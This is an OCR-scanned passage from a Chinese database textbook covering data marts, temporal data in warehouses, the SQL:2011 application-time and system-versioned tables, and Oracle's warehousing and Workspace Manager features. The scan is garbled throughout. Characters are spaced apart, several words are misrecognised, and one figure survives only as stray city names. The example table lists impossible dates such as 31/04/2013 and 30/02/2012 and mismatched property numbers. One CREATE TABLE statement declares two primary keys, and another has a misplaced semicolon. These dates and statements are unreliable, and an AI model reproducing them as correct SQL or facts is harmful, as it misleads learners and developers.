市 。 由 于 这 个 原因 ， 一 个 数据 集 市 可 以 是 独立 的 ， 也 可 以 与 其 他 数据 集 市 通过 符合 的 维度 关 
联 ( 见 32.5 节 )， 或 集中 链接 到 企业 数据 仓库 。 因 此 ， 数 据 集 市 结构 可 以 建 为 两 层 或 三 层 的 
数据 库 应 用 。 数 据 仓 库 是 可 选 的 第 一 层 (如 果 数 据 仓 库 为 数据 集 市 提供 数据 )， 数 据 集 市 是 
第 二 层 ， 而 最 终 用 户 工作 站 是 第 三 层 。 


创建 数据 集 市 的 原因 


创建 数据 集 市 有 许多 原因 ， 主 要 包括 : 

。 让 用 户 访 问 他 们 经 常 需要 分 析 的 数据 。 

按 一 个 部 门 中 一 组 用 户 或 对 一 个 业务 过 程 感 兴趣 的 一 组 用 户 共同 的 视图 呈现 数据 。 

减少 访问 的 数据 量 ， 以 改进 终端 用 户 的 响应 时 间 。 

提供 终端 用 户 访问 工具 ， 例 如 OLAP 或 数据 挖掘 工具 所 指定 的 合适 的 结构 化 数据 ， 

这 可 能 要 求 定义 它们 自己 的 内 部 数据 库 结构 。OLAP 和 数据 挖掘 工具 分 别 在 第 33 章 

和 第 34 章 中 讨论 。 

。 数据 集 市 通常 使 用 的 数据 量 较 少 ， 因 此 ETL 过 程 也 较 简 单 ， 因 此 实现 和 建立 一 个 数 
据 集 市 要 比 建立 一 个 企业 数据 仓库 简单 。 

。 建立 数据 集 市 的 成 本 (无论 时 间 、 金 钱 还 是 资源 ) 通常 都 比 建 一 个 EDW 要 求 得 少 。 

。 数据 集 市 的 潜在 用 户 能 更 清晰 地 确定 ， 用 户 在 数据 集 市 项 目 中 比 在 EDW 项 目 中 更 
容易 定位 到 能 获得 的 支持 。 


31.5 ”数据 仓库 和 时 态 数据 库 


事务 型 系统 与 数据 仓库 系统 之 间 的 一 个 主要 区 别 是 存储 数据 的 当前 性 ， 如 31.1.4 节 所 
述 。 事 务 型 系统 存储 的 是 当前 数据 ， 而 数据 仓库 系统 存储 的 是 历史 数据 。 另 一 个 关键 不 同 
是 ， 当 事务 数据 通过 插入 和 修改 操作 保持 当前 性 时 ， 仓 库 系统 中 的 历史 数据 不 随 之 更 新 ， 仅 
从 源 事务 系统 接收 新 数据 的 补充 插入 。 数 据 仓库 系统 必须 有 效 地 管理 累积 的 历史 数据 与 新 数 
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据 之 间 的 关系 ， 这 就 需要 将 数据 与 时 间 进 行 广泛 和 复杂 的 关联 ， 以 确保 系统 随 着 时 间 的 推移 
保持 一 致 性 。 在 履行 这 一 角色 时 ， 数 据 仓 库 被 描述 为 时 态 数据 库 。 

本 节 先 用 时 态 数据 的 例子 来 说 明 存储 和 分 析 历 史 时 态 数 据 的 复杂 性 。 然 后 ， 通 过 检查 最 
新 的 SQL 标准 ， 即 SQL:2011 的 时 态 扩 展 ， 来 考虑 时 态 数 据 库 如 何 管理 。 


| 时 态 数 据 | 随时 间 变 化 的 数据 。 


时 态 数 据 库 | 包含 随时 间 变 化 的 历史 数据 ， 可 能 还 包括 当前 和 未 来 的 数据 ， 并 能 操纵 这 些 
数据 的 数据 库 。 


在 附录 A 中 描述 的 DreamHome 案例 研究 的 随时 间 变 化 的 事务 数据 示例 ， 在 图 4-3 
中 显示 为 一 个 数据 库 实例 ， 包 括 员工 的 职位 和 薪水 ， 以 及 房产 的 月 租金 (rent) 和 业主 
(ownerNo); 寻 租 客户 首选 的 房产 类 型 (prefType) 和 最 大 月 租金 (maxRent)。 然 而 ，Dream- 
Home 事务 数据 库 与 数据 仓库 之 间 的 差别 是 事务 数据 库 通 常 将 数据 呈现 为 非 时 态 的 并 且 仅 保 
持 数 据 的 当前 值 ， 而 数据 仓库 呈现 的 数据 为 时 态 的 ， 必 须 保存 数据 所 有 过 去 、 现 在 和 未 来 的 
版 本 。 正 是 这 个 原因 ， 我 们 把 非 时 态 的 数据 视 为 时 态 数据 的 一 个 平常 的 情况 ， 此 时 数据 在 现 
实 世 界 和 业务 范畴 内 从 不 改变 ， 或 变化 在 数据 库 中 不 要 记录 。 为 了 说 明 处 理 时 态 数据 的 复杂 
性 ， 考 虑 以 下 两 个 场景 ， 关 于 DreamHome 房产 的 时 态 月 租金 。 

场景 1 

假设 每 个 房产 的 租金 是 在 每 年 年 初 确定 的 ， 在 给 定 的 一 年 间 不 会 更 改 租 金 值 (除了 更 
正 )。 在 这 种 情况 下 ， 对 于 非 时 态 事务 数据 库 ， 没有 必要 将 时 间 与 PropertyForRent 表 相 关 
联 ， 因 为 租金 列 总 是 存储 当前 值 ， 它 可 用 于 所 有 活跃 的 数据 库 应 用 程序 。 但 是 ， 这 不 是 在 
DreamHome 数据 仓库 中 保存 数据 的 情况 。 关 于 房产 的 历史 数据 将 显示 时 间 上 的 多 个 租金 值 ， 
因此 在 这 种 情况 下 租金 值 必须 与 时 间 相关 联 以 指示 一 个 特定 租金 值 何 时 有 效 。 如 果 所 有 房产 
的 租金 在 同一 天 更 新 并 保持 一 年 不 变 ， 那么 确定 有 效 的 租金 价 相对 直截了当 ， 只 需要 在 每 个 
租金 值 上 关联 一 个 标识 年 份 的 值 ， 如 图 31-2a 所 示 。 这 种 情形 下 ， 可 将 {propertyNo，year} 
标识 为 数据 仓库 中 PropertyForRent 表 副 本 的 主 关键 字 。 

场景 2 

假设 每 个 房产 的 租金 可 以 在 一 年 内 随时 更 改 以 吸引 潜在 客户 。 如 同 前 面 非 时 态 事务 数据 
库 的 情形 ,“ 明 显 ” 无 须 将 时 间 与 PropertyForRent 表 相 关联 ， 因 为 租金 列 存储 的 是 最 近 和 当 
前 值 ， 它 可 用 于 活跃 的 数据 库 应 用 。 然 而 ， 在 分 析 数 据 仓库 中 的 时 态 数 据 时 这 种 情况 变 得 更 
复杂 。 分析 历 史 租 金 数 据 要 求 已 知 startDate 和 endDate， 以 建立 每 个 租金 值 的 有 效 期 ， 这 必 
须 交 由 事务 系统 为 数据 仓库 捕获 。 这 种 情形 下 ， 需 要 标识 {propertyNo，startDate，endDate} 
作为 数据 仓库 中 PropertyForRent 表 副 本 的 主 关 键 字 ， 如 图 31-2b 所 示 。 

时 态 数 据 的 影响 意味 着 当 在 事务 数据 库 中 ， 把 一 个 给 定 的 房产 表示 为 单个 记录 时 ， 在 数 
据 仓 库 中 由 于 租金 值 的 变化 同一 房产 将 被 表示 为 几 个 记录 。 此 外 ， 仅 在 固定 时 间 长 度 〈 称 为 
间隔 或 周期 ) 内 有 效 且 使 用 “打开 ”和 “关闭 ”时 间 来 描述 的 时 态 数据 还 要 增加 额外 的 复杂 
性 以 确保 在 某 段 日 期 之 间 存 储 有 效 值 的 记录 不 会 重 倒 ， 如 图 31-2b 所 示 。 

DreamHome 场景 说 明了 时 间 与 有 效 值 之 间 的 关系 在 数据 仓库 中 可 以 变 得 多 复杂 。 确 保 
数据 仓库 中 的 数据 与 源 事务 系统 中 的 变化 一 致 简称 为 “缓慢 变化 维度 问题 "。 如 本 节 场 景 所 
述 ， 在 数据 仓库 中 将 一 个 新 (维度 ) 记录 插入 到 PropertyForRent 表 (如 图 31-2a 和 b 所 示 )， 
以 表示 事务 数据 库 中 的 改变 被 称 为 Type 2 改变 。Type 2 方法 和 处 理 缓慢 变化 维度 的 其 他 选 
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择 将 在 32.5.2 节 讨 论 。 
PropertyForRent 表 


Aberdeen 
Aberdeen 
Aberdeen 
Aberdeen 
Glasgow 


Glasgow 





Glasgow 


a) DreamHome 的 PropertyForRent 表 ， 显 示 ( 场景 1 的 ) 历史 房产 
记录 ， 主 键 为 {propertyNo，year} 


PropertyForRent 表 
PA14 Aberdeen 01/01/2012 31/03/2012 
PA14 Aberdeen 01/04/2012 31/04/2013 
PA14 Aberdeen 01/05/2013 | 31/10/2013 
PA14 Aberdeen 01/11/2013 | 31/03/2014 
PG14 Aberdeen 01/04/2014 | 30/06/2014 
PG14 Aberdeen 01/07/2014 31/12/2014 





PG21 Glasgow 01/01/2012 30/02/2012 
PA21 Glasgow 01/03/2011 30/04/2012 
PA21 Glasgow 01/05/2012 31/10/2013 
PA21 Glasgow 01/11/2013 31/03/2014 
PG21 Glasgow 01/04/2014 31/12/2014 


b) PropertyForRent 表 显示 了 主 关 键 字 为 {propertyNo，startDate，endDate} 的 
历史 属性 记录 (对 于 场景 2 ) 


图 31-2 


为 了 支持 对 随时 间 变 化 的 数据 的 管理 ， 时 态 数 据 库 使 用 两 个 独立 的 时 间 维 度 ， 分 别称 为 
有 效 时 间 (valid time)( 也 称 为 应 用 或 有 效 (effective) 时 间 ) 和 事务 时 间 (transaction time)( 也 
称 为 系统 或 独断 时 间 ) 数据 。 有 效 时 间 是 在 现实 世界 真实 的 时 间 ， 该 事件 维度 允许 从 应 用 或 
业务 的 观点 来 分 析 历 史 数 据 。 例 如 ， 查 询 “ 房 产 “ PA14” 在 2012 年 1 月 25 日 的 月 租金 是 
多 少 ?” 返 回 单个 租金 值 “580” ， 如 图 31-2b 所 示 。 事 务 时 间 是 事务 在 数据 库 上 进行 的 时 间 ， 
此 维度 呈现 了 数据 库 在 给 定时 间 的 状态 。 例 如 ， 对 于 查询 “数据 库 在 2012 年 1 月 25 日 显示 
房产 “ PA14” 的 月 租金 是 什么 ?”， 可 能 返回 单个 值 ， 也 可 能 返回 多 个 值 ， 这 取决 于 在 那 一 
天 对 “ PA14” 的 租金 值 进行 了 什么 更 新 动作 。 对 同一 数据 的 改变 使 用 这 两 个 独立 时 间 维 度 
来 存储 的 时 态 数据 库 被 称 为 双 时 态 (bi-temporal) 数据 库 。 

前 述 场景 中 ， 考 虑 DreamHome 房产 的 时 态 月 租金 时 使 用 了 有 效 时 间 维 度 ， 以 真实 世界 
或 业务 的 角度 来 反映 租赁 数据 。 然 而 ,数据 可 能 由 于 其 他 原因 而 改变 ， 比 如 由 于 纠 错 ， 它 不 
与 有 效 时 间 相 关联 ， 但 这 种 改变 可 以 使 用 事务 时 间 维 度 来 捕获 ， 它 反映 了 数据 库 的 观点 。 总 
之 ， 时 态 数据 的 改变 可 以 使 用 有 效 时 间 、 事 务 时 间或 两 者 共同 来 描述 。 


SQL 标准 的 时 态 扩 展 


本 节 审 视 在 最 新 的 SQL 标准 ， 即 SQL:2011 中 提出 的 时 态 扩 展 。 这 些 扩 展 的 目的 是 支 
持 双 时 态 数据 在 数据 库 中 的 存储 和 管理 ， 这 在 SQL/Foundation of ISO/IEC 9075-2 (ISO， 
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2011 ) 下 面 两 个 可 选 的 类 目 中 有 描述 : 

e T180 系统 - 版 本 化 表 

。 T181 应 用 - 时 间 段 表 

提供 系统 - 版 本 化 表 或 应 用 - 时 间 段 表 的 数据 库 可 以 避免 与 时 态 数据 存储 相关 的 某 些 主 
要 问题 ， 比 如 应 用 程序 代码 为 对 数据 执行 复杂 的 时 间 约束 而 带 来 的 高 复杂 性 以 及 由 此 产生 的 
较 差 的 数据 库 性 能 。 我 们 首先 了 解 SQL 关于 应 用 - 时 间 段 表 的 规范 ， 随 后 再 检查 系统 - 版 
本 化 表 。 

应 用 - 时 间 段 表 

应 用 - 时 间 段 表 的 要 求 是 表 必 须 包 含 两 个 附加 列 : 一 个 用 于 存储 与 该 行 相关 联 的 一 个 
时 间 段 的 开始 时 间 ， 另 一 个 存储 这 个 时 间 段 的 结束 时 间 。 这 通过 使 用 带 用 户 自 定义 段 名 的 
PERIOD 子 句 实现 ， 需 要 用 户 设置 开 始 和 结束 列 的 值 。 还 有 另外 的 语法 供用 户 指定 主 关键 字 / 
唯一 约束 ,确保 没 有 具有 相同 关键 字 的 两 行 具 有 重 公 的 时 间 段 。 

也 为 用 户 提供 了 其 他 语法 来 说 明 引 用 约束 ， 确 保 每 个 子 行 的 时 间 段 完全 包含 在 正好 一 个 
父 行 的 时 间 段 内 ， 或 在 两 个 或 更 多 个 连续 的 父 行 的 时 间 段 组 合 内 。 在 应 用 - 时 间 段 表 上 的 查 
询 、 插 入 、 更 新 和 删除 与 在 常规 表 上 的 查询 、 揪 人、 更 新 和 删除 完全 相同 。 对 于 部 分 时 间 段 
的 更 新 和 删除 分 别提 供 了 UPDATE 和 DELETE 语句 。 

下 面 给 出 使 用 SQL:2011 说 明 一 个 应 用 -时 间 段 表 的 例子 ， 使 用 了 图 31-2b 显示 的 
DreamHome 案例 研究 中 PropertyForRent 表 的 一 个 缩减 版 本 。 然 而 此 时 ， 如 下 语句 所 标识 ， 
主 关键 字 为 {fpropertyNo，rentPeriod} 。 

CREATE TABLE PropertyForRent 

(propertyNo VARCHAR(5) NOT NULL PRIMARY KEY， 

rent MONEY NOT NULL， 

startDate DATE NOT NULL， 

endDate DATE NOT NULL, 

ownerNo VARCHAR(5)， 

PERIOD FOR rentPeriod (startDate, endDate), 

PRIMARY KEY (propertyNo, rentPeriod WITHOUT OVERLAPS)， 

FOREIGN KEY (ownerNo PERIOD rentPeriod) REFERENCES 

Owner (ownerNo, PERIOD ownerPeriod)); 

PERIOD 子 句 自动 强制 实施 约束 以 确保 endDate > startDate。 该 时 间 段 被 认为 是 从 
startDate 值 开 始 ， 恰 好 在 endDate 值 之 前 结束 ， 对 应 于 时 间 段 的 ( 闭 ， 开 ) 模型 。 

系统 版 本 化 表 

系统 版 本 化 表 包 含 一 个 带 预 定义 时 间 段 名 (SYSTEM_TIME) 的 PERIOD 子 句 ， 并 
指定 WITH SYSTEM VERSIONING。 系 统 版 本 化 表 必 须 包含 两 个 附加 列 : 一 个 用 于 存储 
SYSTEM_TIME 段 的 开始 时 间 ， 一 个 用 于 存储 SYSTEM_TIME 段 的 结束 时 间 。 开 始 和 结束 
列 的 值 由 系统 设置 。 不 允许 用 户 为 这 些 列 提 供 值 。 与 常规 表 不 同 ， 系 统 版 本 化 表 在 表 更 新 时 
保留 行 的 旧版 本 。 时 间 段 与 当前 时 间 相交 的 行 称 为 当前 系统 行 。 而 其 他 所 有 行 被 称 为 历史 系 
统 行 。 只 能 更 新 或 删除 当前 系统 行 。 所 有 约束 仅 在 当前 系统 行 上 强制 执行 。 

下 面 给 出 使 用 SQL:2011 说 明 一 个 系统 版 本 化 表 的 例子 ， 使 用 了 DreamHome 案例 研究 
中 PropertyForRent 表 的 一 个 缩减 版 本 。 
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CREATE TABLE PropertyForRent 

(propertyNo VARCHAR(5) NOT NULL, 

rent MONEY NOT NULL, 

ownerNo VARCHAR(5)， 

system_start TIMESTAMP(6) GENERATED ALWAYS AS ROW START， 

system_end TIMESTAMP(6) GENERATED ALWAYS AS ROW END, 

PERIOD FOR SYSTEM_TIME (system_start, system_end), 

PRIMARY KEY (propertyNo), 

FOREIGN KEY (ownerNo) REFERENCES Owner (ownerNo); 

) WITH SYSTEM VERSIONING; 

此 时 ，PERIOD 子 句 自 动 强制 实施 约束 ( system_end > system_start)。 该 时 间 段 被 认为 
是 从 startDate 值 开始 ， 恰 好 在 endDate 值 之 前 结束 ， 对 应 于 时 间 段 的 ( 闭 ， 开 ) 模型 。 有 关 
SQL 新 的 时 态 扩展 的 更 多 详细 信息 请 参考 Kulkarni ( 2012 )。 

对 SQL 的 这 些 时 态 扩展 显然 对 于 需要 存储 和 管理 历史 数据 的 数据 仓库 很 有 好 处 。 将 维 
护 时 态 数据 的 负担 移 给 数据 库 而 不 是 依赖 应 用 程序 代码 将 带 来 诸多 好 处 ， 比 如 提高 时 态 数据 
库 的 完整 性 和 性 能 。 下 一 节 检 查 Oracle 提供 的 支持 数据 仓库 的 机 制 ， 包 括 旨 在 支持 时 态 数 
据 管理 的 特定 服务 。 
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附录 H 对 Oracle DBMS 进行 了 概述 。 本 节 将 讨论 Oracle DBMS 在 提高 数据 仓库 性 能 和 
可 管理 性 方面 的 特性 。 

Oracle 是 数据 仓库 主导 的 关系 数据 库 管 理 系 统 之 一 。Oracle 的 成 功 之 处 在 于 满足 了 数据 
仓库 的 基础 和 核心 需求 : 性 能 、 可 扩展 性 和 可 管理 性 。 数 据 仓 库 需 要 存储 更 多 的 数据 、 支 
持 更 多 的 用 户 、 要 求 更 好 的 性 能 ， 所 以 这 三 个 核心 需求 是 成 功 实现 数据 仓库 的 关键 因素 。 
然而 ，Oracle 超越 了 这 三 个 核心 需求 ， 成 为 第 一 个 真正 的 “数据 仓库 平台 ”。 数 据 仓库 应 
用 程序 需要 专门 的 处 理 技术 ， 提 供 在 大 数据 量 上 进行 复杂 、 即 席 查 询 的 支持 。 为 了 满足 这 
个 特殊 的 需要 ，Oracle 提供 了 各 种 各 样 的 查询 处 理 技术 ， 复 杂 查 询 优化 技术 选择 最 有 效 的 
数据 访问 路 径 ， 可 扩展 的 体系 结构 充分 利用 所 有 的 硬件 并 行 配置 。 一 个 数据 仓库 应 用 程序 
是 否 成 功 ， 关 键 在 于 访问 海量 存储 数据 时 的 性 能 如 何 。Oracle 提供 了 丰富 的 集成 索引 模式 、 
连接 方法 和 汇总 管理 特性 ， 目 的 是 将 查询 结果 迅速 传 给 数据 仓库 用 户 。Oracle 还 能 识别 有 
混合 工作 负载 的 应 用 程序 ， 以 及 在 执行 事务 或 查询 时 ， 管 理 员 在 哪儿 要 控制 哪些 用 户 或 用 
户 组 有 优先 权 。 本 节 将 概要 介绍 Oracle 支持 数据 仓库 应 用 程序 的 一 些 主要 特性 。 这 些 特 性 
包括 : 
汇总 管理 。 

分 析 功 能 。 
位 图 索引 。 

高 级 连接 方法 。 
成 熟 的 SQL 优化 器 。 

e 资源 管理 器 。 

汇总 管理 

在 数据 仓库 应 用 程序 中 ， 用 户 经 常会 在 日 常 维度 ， 如 月 份 、 产 品 、 地 区 等 常见 维 上 查询 
汇总 数据 。Oracle 提供 了 存储 多 维 数据 与 关系 表 上 的 汇总 数据 的 机 制 。 因 此 ， 当 查询 需要 细 


360 锚 九 部 分 商 条 和 大 能 


节 记 录 的 汇总 信息 时 ， 查 询 临 时 被 改写 为 访问 这 些 预 先 存储 好 的 汇总 数据 ， 而 不 是 每 次 都 对 
查询 涉及 的 详细 数据 进行 汇总 计算 。 这 种 方法 极 大 地 改善 了 查询 的 性 能 。 这 些 汇总 数据 会 根 
据 基本 表 中 的 数据 自动 维持 。Oracle 还 提供 了 汇总 建议 功能 ， 它 帮助 数据 库 管理 员 根 据 实际 
工作 量 和 统计 模式 来 选择 最 有 效 的 汇总 数据 表 。Oracle Enterprise Manager 支持 通过 图 形 接 
口 创建 与 管理 物化 视图 和 相关 维 与 层次 ， 极 大 地 简化 了 物化 视图 的 管理 。 

分 析 功 能 

Oracle 包括 了 一 组 用 于 商务 智能 与 数据 仓库 应 用 的 SQL 函数 。 这 些 函 数 被 统称 为 “分 
析 函 数 ”"， 它 们 可 以 改善 查询 性 能 ， 简 化 许多 商务 分 析 查 询 的 编码 。 新 能 力 的 一 些 示例 
如 下 : 

e 排序 (例如 ， 在 英国 每 个 地 区 哪 10 个 人 的 销售 额 最 高 ) 。 

。 变化 聚集 (例如 ， 这 三 个 月 内 房产 销售 变化 的 平均 值 是 多 少 )。 

e 其 他 函数 包括 累计 聚集 、 落 后 / 领先 表达 式 、 同 期 比较 和 比例 报告 (ratio-to-report) 。 

Oracle 还 包括 通过 SQL 进行 OLAP 分 析 的 CUBE 和 ROLLUP 操作 ， 这 些 分 析 和 OLAP 
功能 极 大 地 扩展 了 Oracle 在 分 析 应 用 程序 上 的 能 力 (参见 第 33 章 )。 

位 图 索引 

位 图 索引 能 提高 数据 仓库 应 用 程序 的 性 能 。 这 种 索引 方式 与 其 他 索引 方式 互补 共存 ， 包 
括 标准 B 树 索 引 、 簇 集 表 及 散 列 簇 集 。 虽 然 使 用 唯一 标识 符 检 索 数据 时 ，B 树 索 引 可 能 是 最 
有 效 的 方式 ， 但 基于 多 个 更 宽 的 标准 检索 数据 时 ， 位 图 索引 可 能 是 最 有 效 的 ， 如 “上 个 月 总 
共 销 售 了 多 少 间 公 寓 ? ”在 数据 仓库 应 用 程序 中 ， 终 端 用 户 经 常 基于 这 些 更 宽 的 标准 查询 数 
据 。Oracle 通过 使 用 高 级 数据 压缩 技术 来 有 效 存 储 位 图 索引 。 

高 级 连接 操作 

Oracle 提供 了 适 于 表 分 割 的 连接 操作 ， 如 果 表 是 按照 连接 关键 字 进 行 分 割 的 ， 那么 在 做 
连接 操作 时 性 能 会 有 显著 提高 。 原 因 是 只 对 有 匹配 连接 关键 字 的 分 割 执 行 连接 操作 ， 其 他 分 
割 不 执行 。 由 于 要 求 更 少 的 内 存 排 序 ， 所 以 占用 内 存 空间 也 更 少 。 

散 列 连接 操作 在 许多 复杂 的 查询 中 能 够 提供 比 其 他 连接 操作 更 好 的 性 能 ， 尤 其 是 当 一 些 
查询 中 的 现存 索引 不 能 在 连接 过 程 中 起 作用 时 ， 这 在 即席 查询 环境 中 经 常 发 生 。 散 列 连接 通 
过 在 内 存 中 实时 构建 散 列表 ， 消 除了 排序 的 需要 。 这 种 散 列 连接 十 分 适合 可 扩展 的 并 行 执行 。 

成 熟 的 SQL 优化 器 

Oracle 提供 了 许多 强大 的 查询 处 理 技术 ， 只 是 对 终端 用 户 完全 透明 。Oracle 基于 代价 的 
优化 器 动态 地 为 每 个 查询 决定 最 有 效 的 连接 与 访问 路 径 。 它 还 结合 了 强大 的 转换 技术 ， 能 够 
自动 地 对 终端 用 户 工具 产生 的 查询 进行 优化 改写 ， 以 便 更 有 效 地 执行 。 

为 了 选择 更 有 效 的 查询 处 理 策 略 ，Oracle 基于 代价 的 优化 器 将 统计 信息 考虑 在 内 ， 例 
如 每 个 表 的 大 小 、 每 个 查询 条 件 的 选择 率 。 直 方 图 也 为 基于 代价 的 优化 器 提供 了 牌 斜 的 、 不 
规整 数据 分 布 的 更 详细 统计 信息 。 基 于 代价 的 优化 器 优化 了 在 数据 仓库 中 普遍 存在 的 基于 
星 形 模式 的 查询 (参见 32.2 节 )。 通 过 使 用 成 熟 的 星 形 查询 优化 算法 和 位 图 索引 ，Oracle 可 
以 显著 地 减少 传统 连接 方式 中 的 查询 工作 量 。Oracle 查询 处 理 不 仅 包 含 了 全 套 的 专业 化 技术 
(优化 、 访 问 和 连接 方法 、 查 询 执行 )， 这 些 技术 还 可 以 无 颖 集成 以 达到 查询 处 理 引 擎 的 最 优 
性 能 。 

资源 管理 器 

在 多 用 户 数据 仓库 或 OLTP 应 用 中 管理 CPU 和 磁盘 资源 是 一 项 具有 挑战 性 的 工作 。 访 
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问 数据 仓库 的 用 户 越 多 ， 对 资源 的 竞争 也 就 越 激烈 。Oracle 提供 资源 管理 功能 来 给 用 户 分 配 
系统 资源 。 重 要 的 联机 用 户 ， 比 如 处 理 订单 的 职员 ， 可 给 予 较 高 的 优先 权 ， 而 那些 运行 批量 
报表 的 用 户 则 给 予 较 低 的 优先 权 。 用 户 被 赋予 相应 的 资源 类 ， 比 如 说 “订单 处 理 ” 类 或 “ 批 
量 处理 ” 类 ， 每 种 资源 类 被 分 配给 合适 比例 的 机 器 资源 。 这 样 ， 高 优先 权 的 用 户 会 比 低 优先 
权 的 用 户 分 配 到 更 多 的 系统 资源 。 

其 他 数据 仓库 特性 

Oracle 还 包括 了 许多 新 特性 ， 用 于 改进 数据 仓库 应 用 的 管理 和 性 能 。 可 以 在 线 完成 索引 
重建 ， 而 不 会 打 断 基 表 中 的 插入 、 更 新 和 删除 操作 。 基 于 函数 的 索引 可 以 用 来 索引 表达 式 ， 
如 算术 表达 式 或 更 改 列 值 的 函数 。 样 本 扫描 功能 允许 查询 运行 和 仅 访 问 表 的 指定 一 部 分 行 或 
块 。 这 对 于 获取 有 意义 的 聚集 量 (比如 平均 值 ) 是 有 用 的 ， 它 无 须 访问 表 的 每 一 行 。 


31.6.1 ” Oracle 11g 的 仓库 特性 


Oracle Database 11g 是 一 个 用 于 数据 仓库 和 商务 智能 的 综合 数据 库 平 台 ， 它 将 业界 领先 
的 可 扩展 性 和 性 能 、 深 度 集成 的 分 析 能 力 、 租 入 式 集 成 和 数据 质量 组 合 到 一 起 ， 所 有 这 些 都 
在 一 个 单一 平台 上 ， 运 行 于 可 靠 、 低 成 本 的 网 格 基础 设施 。Oracle 数据 库 为 数据 仓库 和 数据 
集 市 提供 功能 ， 拥 有 强大 的 分 区 功能 、 数 百 TB 的 可 扩展 性 以 及 创新 查询 处 理 优化 。Oracle 
数据 库 还 提供 了 一 个 独特 的 集成 分 析 平 台 ， 通 过 在 数据 库 中 直接 做 人 OLAP、 数 据 挖掘 和 统 
计 能 力 ，Oracle 提供 了 各 单独 分 析 引 擎 的 所 有 功能 ， 同 时 具有 Oracle Database 的 企业 可 扩 
展 性 、 安 全 性 和 可 靠 性 。Oracle Database 包括 Oracle Warehouse Builder 经 过 验证 的 ETL 功 
能 ， 稳 健 的 ETL 对 任何 DW/BI 项 目 至 关 重 要 ，OWB 为 每 个 Oracle Database 提供 一 个 解决 
方案 。 下 面 列 出 的 是 与 Oracle 相关 联 的 关键 仓库 功能 的 一 些 例 子 。 
@ 物化 视图 (Materialized View，MV)。MYV 功能 使 用 Oracle 复制 机 制 来 创建 MV， 
以 表示 预 汇总 和 预 连接 的 表 。 
自动 工作 负载 存储 库 (Automated Workload Repository，AWR )。AWR 是 数据 仓库 预 
测 工 具 ， 如 dbms_advisor 包 的 关键 组 件 。 
STAR 查询 优化 (query optimization)。Oracle STAR 查询 功能 支持 复杂 分 析 查 询 的 创 
建 和 高 效 运行 。 
@ 表 和 索引 的 多 级 分 区 ( multilevel partitioning of tables and indexes)。Oracle 具有 多 层 
智能 分 区 方法 ， 它 允许 Oracle 以 精确 模式 存储 数据 。 
@ 异步 更 改 数据 捕获 〈asynchronous Change Data Capture, CDC ) 。CDC 允许 增 量 提取 ， 
使 得 仅 需 提取 更 改过 的 数据 上 传 到 数据 仓库 。 
Oracle 流 (Oracle Stream )。 基 于 流 的 馈送 机 制 可 以 从 运营 数据 库 中 捕获 必要 的 数据 
更 改 并 将 其 发 送 到 目标 数据 仓库 。 
@ 只 读 表 空间 (read-only tablespace)。 使 用 表 空 间 分 区 并 将 较 旧 的 表 空 间 标记 为 只 读 ， 
可 以 大 大 提高 时 间 序 列 仓库 的 性 能 ， 仓 库 中 的 信息 最 终 变 为 静态 。 
@ 自动 存储 管理 (Automatic Storage Management，ASM)。 管 理 磁盘 IO 子 系统 的 ASM 
方法 移 除 了 IO 负载 平衡 和 磁盘 管理 的 困难 任务 。 
@ 高 级 数据 缓冲 区 管理 (advanced data buffer management)。 使 用 Oracle 的 多 种 块 大 小 
和 KEEP 池 意 味 着 仓库 对 象 可 以 被 预 分 配 到 分 离 的 数据 缓冲 区 ， 并且 可 以 确保 频繁 
引用 数据 的 工作 集 总 是 被 缓存 着 。 
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31.6.2 ”Oracle 对 时 态 数据 的 支持 


Oracle 提供 了 一 个 名 为 Workspace Manager 的 产品 来 管理 时 态 数据 ， 这 通过 一 系列 功能 
实现 ， 包 括 提供 时 间 段 数据 类 型 、 支 持 有 效 时 间 、 支 持 事务 时 间 、 支 持 双 时 态 表 ， 以 及 对 序 
列 化 主 关键 字 、 序 列 化 唯一 性 、 序 列 化 引用 完整 性 和 序列 化 选择 和 投影 的 支持 ， 并 且 是 类 似 
于 SQL/Temporal 所 提 的 方式 。 

Workspace Manager 提供 了 一 种 基础 设施 ， 使 应 用 能 方便 地 创建 工作 空间 ( workspace)， 
并 将 表 行 值 的 不 同 版 本 分 组 到 不 同 的 工作 空间 。 当 维护 旧 数 据 的 副本 时 ， 还 允许 用 户 创 建 数 
据 的 一 个 新 版 本 用 于 更 新 。 活 动 进行 的 持续 结果 都 永久 存储 ， 确 保 并 发 性 和 一 致 性 。 

Workspace Manager 维护 数据 更 改 的 历史 记录 。 你 可 以 在 工作 空间 和 行 版 本 中 导航 ， 而 
把 数据 库 看 作 一 个 个 特定 里 程 碑 或 时 间 点 。 你 可 以 将 工作 空间 中 行 或 表 的 更 改 回 深 到 一 个 里 
程 碑 。 典 型 的 例子 可 能 是 土地 信息 管理 应 用 ， 此 时 Workspace Manager 通过 维护 土地 所 有 变 
化 的 历史 来 支持 监管 需求 。 

系统 版 本 化 表 

Workspace Manager 通过 允许 用 户 对 数据 库 中 一 个 或 多 个 用 户 表 启用 版 本 来 实现 此 目 
的 。 当 表 启 用 版 本 后 ， 表 中 的 所 有 行 都 可 以 支持 多 个 版 本 的 数据 。 版 本 控制 基础 设施 对 数据 
库 的 用 户 不 可 见 ， 应 用 程序 中 用 于 选择 、 插 入 、 修 改 和 删除 数据 的 SQL 语句 ， 对 启用 版 本 
的 表 工 作 如 常 ， 但 在 启用 版 本 的 表 中 不 能 更 新 主 关键 字 列 的 值 。( Workspace Manager 通过 维 
护 系 统 视 图 和 创建 INSTEAD OF 和 触发 器 来 实现 这 些 能 力 ， 不 过 应 用 开发 人 员 和 用 户 不 需要 
看 见 这 些 视 图 和 触发 器 或 与 之 进行 交互 。) 

一 个 表 启 用 版 本 后 ， 工 作 空间 中 的 用 户 自动 看 到 他 感 兴趣 的 记录 的 正确 版 本 。 工 作 空 间 
是 个 虚拟 环境 ， 一 个 或 多 个 用 户 可 以 共享 对 数据 库 中 数据 进行 的 修改 。 有 逻辑 上 ， 工 作 空间 是 
将 来 自 一 个 或 多 个 启用 版 本 表 的 一 组 新 行 版 本 组 织 在 一 起 ， 隔 离 这 些 版 本 直到 它们 被 明确 与 
生产 数据 合并 或 丢弃 ， 从 而 提供 最 大 的 并 发 性 。 工 作 空间 中 的 用 户 始终 看 到 整个 数据 库 的 一 
致 的 事务 视图 。 也 就 是 说 ， 他 能 看 见 在 他 当前 的 工作 空间 所 做 的 修改 加 上 数据 库 中 其 余 的 数 
据 ， 只 是 这 些 数据 不 是 一 如 它们 在 创建 工作 空间 时 的 样子 ， 就 是 工作 空间 最 近 一 次 刷新 来 自 
父 工作 空间 的 更 改 后 的 样子 。 

